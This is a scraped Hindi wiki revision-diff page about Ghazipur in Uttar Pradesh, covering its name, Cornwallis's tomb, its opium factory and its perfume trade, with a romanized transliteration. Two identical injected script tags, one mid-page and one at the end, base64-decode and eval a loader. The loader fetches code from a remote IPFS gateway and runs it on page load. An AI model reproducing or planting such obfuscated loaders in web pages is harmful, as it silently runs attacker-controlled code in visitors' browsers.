Difference between revisions of "ग़ाज़ीपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "कब्र" to "क़ब्र")
 
Line 2: Line 2:
 
'''ग़ाज़ीपुर''' पूर्वी [[उत्तर प्रदेश]] का एक प्रधान नगर है। यह नगर [[गंगा नदी]] के ऊँचे कगार पर बसा हुआ है। स्थानीय जनश्रुति के अनुसार इस नगर को राजा 'गाधिपुर' ने बसाया था। इसका मूल नाम गाधिपुर ही था, जो [[मुस्लिम]] शासन काल में, 1352 ई. के लगभग मसूद ग़ाज़ी के नाम पर ग़ाज़ीपुर हो गया।
 
'''ग़ाज़ीपुर''' पूर्वी [[उत्तर प्रदेश]] का एक प्रधान नगर है। यह नगर [[गंगा नदी]] के ऊँचे कगार पर बसा हुआ है। स्थानीय जनश्रुति के अनुसार इस नगर को राजा 'गाधिपुर' ने बसाया था। इसका मूल नाम गाधिपुर ही था, जो [[मुस्लिम]] शासन काल में, 1352 ई. के लगभग मसूद ग़ाज़ी के नाम पर ग़ाज़ीपुर हो गया।
  
*[[बंगाल]] के [[अंग्रेज़]] [[गवर्नर-जनरल]] [[लॉर्ड कॉर्नवॉलिस]] की मृत्यु इसी स्थान पर 1805 ई. में हुई थी। उसकी संगमरमर की कब्र यहाँ स्मारक रूप में मौजूद है।
+
*[[बंगाल]] के [[अंग्रेज़]] [[गवर्नर-जनरल]] [[लॉर्ड कॉर्नवॉलिस]] की मृत्यु इसी स्थान पर 1805 ई. में हुई थी। उसकी संगमरमर की क़ब्र यहाँ स्मारक रूप में मौजूद है।
 
*स्थानीय किवदंती में ग़ाज़ीपुर का प्राचीन नाम 'गर्जपतिपुर' या 'गर्जपुर' भी कहा जाता है।
 
*स्थानीय किवदंती में ग़ाज़ीपुर का प्राचीन नाम 'गर्जपतिपुर' या 'गर्जपुर' भी कहा जाता है।
 
*ग़ाज़ीपुर नगर दो मील से अधिक लंबा तथा तीन मील चौड़ा है। यहाँ गंगा पर कई पक्के घाट निर्मित है। यहाँ एक क़िला चालीस खंभों पर खड़ा राजमहल तथा अनेक मस्जिदें और मंदिर हैं।  
 
*ग़ाज़ीपुर नगर दो मील से अधिक लंबा तथा तीन मील चौड़ा है। यहाँ गंगा पर कई पक्के घाट निर्मित है। यहाँ एक क़िला चालीस खंभों पर खड़ा राजमहल तथा अनेक मस्जिदें और मंदिर हैं।  

Latest revision as of 13:23, 14 May 2013

[[chitr:Ruins-Of-A-Palace-At-Gazipoor.jpg|thumb|ganga nadi ke pas sthit ek mahal ke avashesh, gazipur]] gazipur poorvi uttar pradesh ka ek pradhan nagar hai. yah nagar ganga nadi ke ooanche kagar par basa hua hai. sthaniy janashruti ke anusar is nagar ko raja 'gadhipur' ne basaya tha. isaka mool nam gadhipur hi tha, jo muslim shasan kal mean, 1352 ee. ke lagabhag masood gazi ke nam par gazipur ho gaya.

  • bangal ke aangrez gavarnar-janaral l aaurd k aaurnav aaulis ki mrityu isi sthan par 1805 ee. mean huee thi. usaki sangamaramar ki qabr yahaan smarak roop mean maujood hai.
  • sthaniy kivadanti mean gazipur ka prachin nam 'garjapatipur' ya 'garjapur' bhi kaha jata hai.
  • gazipur nagar do mil se adhik lanba tatha tin mil chau da hai. yahaan ganga par kee pakke ghat nirmit hai. yahaan ek qila chalis khanbhoan par kh da rajamahal tatha anek masjidean aur mandir haian.
  • uttar pradesh ke aphim vibhag ka yah keandr hai, aur yahaan aphim ka ek b da karakhana[1] hai.
  • vibhinn prakar ke phooloan se bane tel, itr tatha suangadhit jal[2] adi ke lie gazipur madhy kal se prasiddh raha hai.
  • gazipur relamarg khulane se pahale ganga nadi dvara vyapar hota tha, aur gazipur uttar bharat ke gine-chune vyaparik nagaroan mean se ek tha.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

“khand 7”, hindi vishvakosh, 1966 (hindi), bharatadiskavari pustakalay: nagari pracharini sabha varanasi, 339.

  1. 45 ek d mean vistrit
  2. kev dajal, gulabajal

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>